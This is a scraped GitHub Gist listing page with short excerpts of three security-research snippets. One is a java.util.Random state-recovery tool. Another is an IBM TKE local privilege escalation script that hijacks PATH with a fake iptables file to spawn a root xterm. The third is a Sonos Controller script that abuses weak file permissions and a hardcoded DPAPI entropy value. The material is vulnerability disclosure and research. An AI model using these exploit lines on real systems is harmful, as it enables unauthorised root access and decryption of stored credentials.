Skip to content

Instantly share code, notes, and snippets.

Yorick Koster ykoster

Block or report user

Report or block ykoster

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@ykoster
ykoster / mordan.c
Created Jun 4, 2019
Mordan is a program that can be used to determine the internal state of the java.util.Random() random number generator
View mordan.c
/* ---------------------------------------------------------------------
* mordan.c
* revision 0.4
* ---------------------------------------------------------------------
* November 2005, Yorick Koster, ITsec Security Services
* ---------------------------------------------------------------------
* Mordan is a program that can be used to determine the internal state
* of the java.util.Random() random number generator. In order to do so,
* mordan requires two integer values (created with Random.nextInt())
* or one long value (created with Random.nextLong()).
@ykoster
ykoster / gotroot.sh
Created Mar 31, 2019
IBM Trusted Key Entry (TKE) workstation local privilege escalation
View gotroot.sh
#!/bin/bash
OLDPATH=$PATH
trap cleanup EXIT
export PATH=.:$PATH
/bin/cat > $HOME/iptables << __EOF
#!/bin/bash
/bin/su -c /usr/bin/xterm
__EOF
@ykoster
ykoster / SonosController.ps1
Last active Apr 3, 2019
Sonos Controller for Windows ShareConfig.xml weak file permissions
View SonosController.ps1
# load System.Security for HMAC-SHA256
Add-Type -AssemblyName System.Security
$ip = "127.0.0.1"
$port = 3445
$configPath = "$env:ProgramData\Sonos,_Inc\runtime\ShareConfig.xml"
$sharePath = "$env:windir\media"
# the entropy value is hardcoded in the service and used for encrypting and decrypting the password of the Sonos user (DPAPI)
$entropy = [System.Text.Encoding]::Unicode.GetBytes("e51bd1fb-2783-4261-95b8-027afc69e8af");
You can’t perform that action at this time.